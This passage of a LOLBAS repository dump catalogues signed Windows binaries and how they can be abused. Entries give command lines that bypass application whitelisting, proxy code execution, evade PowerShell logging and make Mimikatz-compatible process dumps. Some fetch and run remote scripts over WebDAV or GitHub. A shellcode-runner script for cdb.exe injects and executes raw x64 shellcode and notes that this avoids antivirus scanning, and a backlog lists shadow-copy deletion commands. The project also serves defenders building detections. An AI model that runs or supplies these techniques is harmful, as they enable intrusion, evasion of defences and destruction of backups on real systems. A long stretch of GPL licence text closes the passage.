VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
Set a registry key-value for persistence via an INF file call through VBoxDrvInst.exe.
```

* Resources:
  * https://twitter.com/pabraeken/status/993497996179492864
* Full path:
  * C:\Program Files\Oracle\VirtualBox Guest Additions
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Appvlp.exe.md
================================================
## Appvlp.exe

* Functions: Execute

```
AppVLP.exe \\webdav\calc.bat
Executes calc.bat through AppVLP.exe.

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Executes powershell.exe as a subprocess of AppVLP.exe and runs the respective PS command.

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Executes powershell.exe as a subprocess of AppVLP.exe and runs the respective PS command.
```

* Resources:
  * https://github.com/MoooKitty/Code-Execution
  * https://twitter.com/moo_hax/status/892388990686347264
* Full path:
  * C:\Program Files\Microsoft Office\root\client\appvlp.exe
  * C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
* Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Bginfo.exe.md
================================================
## Bginfo.exe

* Functions: Execute

```
bginfo.exe bginfo.bgi /popup /nolicprompt
Execute VBscript code that is referenced within the bginfo.bgi file.

"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
Execute bginfo.exe from a WebDAV server.

"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
This style of execution may no longer work due to a patch.
```

* Resources:
  * https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
* Full path:
  * No fixed path
* Notes: Thanks to Oddvar Moe - @oddvarmoe

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Cdb.exe.md
================================================
## Cdb.exe

* Functions: Execute

```
cdb.exe -cf x64_calc.wds -o notepad.exe
Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
```

* Resources:
  * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
  * https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
  * https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
* Full path:
  * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
  * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
* Notes: Thanks to Matt Graeber - @mattifestation

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Dxcap.exe.md
================================================
## Dxcap.exe

* Functions: Execute

```
Dxcap.exe -c C:\Windows\System32\notepad.exe
Launch notepad as a subprocess of Dxcap.exe.
```

* Resources:
  * https://twitter.com/harr0ey/status/992008180904419328
* Full path:
  * c:\Windows\System32\dxcap.exe
  * c:\Windows\SysWOW64\dxcap.exe
* Notes: Thanks to Matt harr0ey - @harr0ey

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Mftrace.exe.md
================================================
## Mftrace.exe

* Functions: Execute

```
Mftrace.exe cmd.exe
Launch cmd.exe as a subprocess of Mftrace.exe.

Mftrace.exe powershell.exe
Launch powershell.exe as a subprocess of Mftrace.exe.
```

* Resources:
  * https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
* Full path:
  * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
  * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
  * C:\Program Files (x86)\Windows Kits\10\bin\x86
  * C:\Program Files (x86)\Windows Kits\10\bin\x64
* Notes: Thanks to fabrizio - @0rbz_

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Msdeploy.exe.md
================================================
## Msdeploy.exe

* Functions: Execute

```
msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Launch calc.bat via msdeploy.exe.
```

* Resources:
  * https://twitter.com/pabraeken/status/995837734379032576
* Full path:
  * C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Payload/Cdb_calc.wds
================================================
$$ Save this to a file - e.g. x64_calc.wds
$$ Example: launch this shellcode in a host notepad.exe process.
$$ cdb.exe -cf x64_calc.wds -o notepad.exe

$$ Allocate 272 bytes for the shellcode buffer
$$ Save the address of the resulting RWX in the pseudo $t0 register
.foreach /pS 5 ( register { .dvalloc 272 } ) { r @$t0 = register }

$$ Copy each individual shellcode byte to the allocated RWX buffer
$$ Note: The `eq` command could be used to save space, if desired.
$$ Note: .readmem can be used to read a shellcode buffer too but
$$ shellcode on disk will be subject to AV scanning.
;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4
;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00
;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51
;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51
;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2
;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52
;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52
;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52
;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72
;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7
;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb @$t0+2B 31
;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0
;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C
;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41
;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41
;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED
;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48
;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B
;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01
;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88
;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48
;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67
;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50
;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44
;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49
;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56
;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41
;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48
;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31
;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0
;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9
;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1
;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1
;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24
;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1
;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44
;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49
;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41
;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44
;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49
;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B
;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01
;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41
;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A
;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59
;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83
;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52
;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41
;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B
;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF
;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48
;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00
;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00
;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D
;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00
;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B
;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5
;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A
;eb @$t0+E8 0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6
;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF
;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4
;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C
;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0
;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47
;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A
;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89
;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63
;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00

$$ Redirect execution to the shellcode buffer
r @$ip=@$t0

$$ Continue program execution - i.e. execute the shellcode
g

$$ Continue program execution after hitting a breakpoint
$$ upon starting calc.exe. This is specific to this shellcode.
g

$$ quit cdb.exe
q

================================================
FILE: Archive-Old-Version/OtherMSBinaries/SQLToolsPS.exe.md
================================================
## SQLToolsPS.exe

* Functions: Execute, evade logging

```
SQLToolsPS.exe -noprofile -command Start-Process calc.exe
Run PowerShell scripts and commands.
```

* Resources:
  * https://twitter.com/pabraeken/status/993298228840992768
* Full path:
  * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Sqldumper.exe.md
================================================
## Sqldumper.exe

* Functions: Dump process

```
sqldumper.exe 464 0 0x0110
Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).

sqldumper.exe 540 0 0x01100:40
The 0x01100:40 flag will create a Mimikatz compatible dump file.
```

* Resources:
  * https://twitter.com/countuponsec/status/910969424215232518
  * https://twitter.com/countuponsec/status/910977826853068800
  * https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
* Full path:
  * C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
  * C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
* Notes: Thanks to Luis Rocha - @countuponsec

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Sqlps.exe.md
================================================
## Sqlps.exe

* Functions: Execute, evade logging

```
Sqlps.exe -noprofile
Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
```

* Resources:
  * https://twitter.com/bryon_/status/975835709587075072
* Full path:
  * C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
* Notes: Thanks to Bryon - @bryon_

================================================
FILE: Archive-Old-Version/OtherMSBinaries/Tracker.exe.md
================================================
## Tracker.exe

* Functions: Execute

```
Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
```

* Resources:
  * https://twitter.com/subTee/status/793151392185589760
  * https://attack.mitre.org/wiki/Execution
* Full path:
  *
* Notes: Thanks to Casey Smith - @subTee

================================================
FILE: Archive-Old-Version/OtherMSBinaries/csi.exe.md
================================================
## csi.exe

* Functions: Execute

```
csi.exe file
Use csi.exe to run unsigned C# code.
```

* Resources:
  * https://twitter.com/subTee/status/781208810723549188
  * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
* Full path:
  * c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
  * c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
* Notes: Thanks to Casey Smith - @subtee

================================================
FILE: Archive-Old-Version/OtherMSBinaries/dnx.exe.md
================================================
## dnx.exe

* Functions: Execute

```
dnx.exe consoleapp
Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies).
```

* Resources:
  * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
* Full path:
  * N/A
* Notes: Thanks to Matt Nelson - @enigma0x3

================================================
FILE: Archive-Old-Version/OtherMSBinaries/msxsl.exe.md
================================================
## msxsl.exe

* Functions: Execute

```
msxsl.exe customers.xml script.xsl
Run COM Scriptlet code within the script.xsl file (local).

msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Run COM Scriptlet code within the shellcode.xml (xsl) file (remote).
```

* Resources:
  * https://twitter.com/subTee/status/877616321747271680
  * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
* Full path:
  * N/A
* Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote)

================================================
FILE: Archive-Old-Version/OtherMSBinaries/rcsi.exe.md
================================================
## rcsi.exe

* Functions: Execute

```
rcsi.exe bypass.csx
Use embedded C# within the csx script to execute the code.
```

* Resources:
  * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
* Full path:
  *
* Notes: Thanks to Matt Nelson - @enigma0x3

================================================
FILE: Archive-Old-Version/OtherMSBinaries/te.exe.md
================================================
## te.exe

* Functions: Execute

```
te.exe bypass.wsc
Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
```

* Resources:
  * https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
* Full path:
  *
* Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s

================================================
FILE: Archive-Old-Version/OtherMSBinaries/vsjitdebugger.exe.md
================================================
## vsjitdebugger.exe

* Functions: Execute

```
Vsjitdebugger.exe calc.exe
Executes calc.exe as a subprocess of Vsjitdebugger.exe.
```

* Resources:
  * https://twitter.com/pabraeken/status/990758590020452353
* Full path:
  * c:\windows\system32\vsjitdebugger.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

================================================
FILE: Archive-Old-Version/OtherMSBinaries/winword.exe.md
================================================
## winword.exe

* Functions: Execute

```
winword.exe /l dllfile.dll
Launch DLL payload.
```

* Resources:
  * https://twitter.com/vysecurity/status/884755482707210241
  * https://twitter.com/Hexacorn/status/885258886428725250
* Full path:
  * c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
* Notes: Thanks to Vincent Yiu - @vysecurity (Cmd), Adam - @Hexacorn (Internals)

================================================
FILE: Archive-Old-Version/OtherScripts/testxlst.js.md
================================================
## testxlst.js

* Functions: Execute

```
cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Test Jscript included in Python tool to perform XSL transform (for payload execution).

wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Test Jscript included in Python tool to perform XSL transform (for payload execution).
```

* Resources:
  * https://twitter.com/bohops/status/993314069116485632
* Full path:
  * c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
* Notes: Thanks to Jimmy - @bohops

================================================
FILE: Backlog.txt
================================================
Ntsd.exe Debugger
Kd.exe Debugger
Certreq.exe Exfiltrate data
Dbghost.exe
Robocopy.exe Needs examples
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
wbadmin.exe wbadmin delete catalog -quiet
psexec.exe Remote execution of code
java.exe -agentpath: or -agentlib:
WinMail.exe DLL Sideloading
odbcad32.exe GUI DLL Loading
WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f
dvdplay.exe

http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
https://twitter.com/Hexacorn/status/993498264497541120
https://twitter.com/Hexacorn/status/994000792628719618
https://github.com/MoooKitty/Code-Execution

================================================
FILE: CONTRIBUTING.md
================================================
# Contributing

First, thank you for contributing!

When submitting new LOLs, please submit a `yml` sourcefile (`yml/`) as these are used to generate everything else.

Next, review `README.md` and ensure that your LOL meets the criteria: interesting or unexpected functionality that would be useful to an attacker.

There's nothing special about the format. Just base your entry off an existing one and modify as required. Please ensure that you do not add or remove any of the fields; all are required.
There is a template that can be used located here if you do not want to copy one of the existing LOLs: https://github.com/LOLBAS-Project/LOLBAS/blob/master/YML-Template.yml It is also important to use these (https://github.com/LOLBAS-Project/LOLBAS/blob/master/CategoryList.md) categories, since they relate to the web portal and it is crucial to get them right for everything to work. Looking forward for your contributions. ================================================ FILE: CategoryList.md ================================================ CATEGORY LIST ADS AWL bypass Compile Conceal Copy Credentials Decode Download Dump Encode Execute Reconnaissance Tamper UAC bypass Upload ================================================ FILE: LICENSE ================================================ GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. 
Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. 
If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. 
Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. 
However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. 
Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. 
b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. 
b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. 
A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. 
But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. 
